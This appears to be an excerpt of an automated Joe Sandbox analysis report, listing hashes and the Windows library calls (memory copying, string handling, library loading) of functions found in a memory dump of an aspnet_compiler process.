                                                                                                                                                                                                                                                                  • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                                                                                                                                  • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                                                  • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                                                                                                                  • API String ID: 2773794195-880857682
                                                                                                                                                                                                                                                                  • Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                                                                                                                                                                                  • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 438689982-0
                                                                                                                                                                                                                                                                  • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                                                                                                  • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??2@$memset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1860491036-0
                                                                                                                                                                                                                                                                  • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                                                                                                  • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memcmp.MSVCRT ref: 00408AF3
                                                                                                                                                                                                                                                                    • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                                                                                                                                                                                                                    • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                                                                                                                                                                                                                                                    • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                                                                                                                                                                                                                                                  • memcmp.MSVCRT ref: 00408B2B
                                                                                                                                                                                                                                                                  • memcmp.MSVCRT ref: 00408B5C
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 00408B79
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcmp$memcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 231171946-0
                                                                                                                                                                                                                                                                  • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                                                                                  • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1961120804-0
                                                                                                                                                                                                                                                                  • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                                                                                                  • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%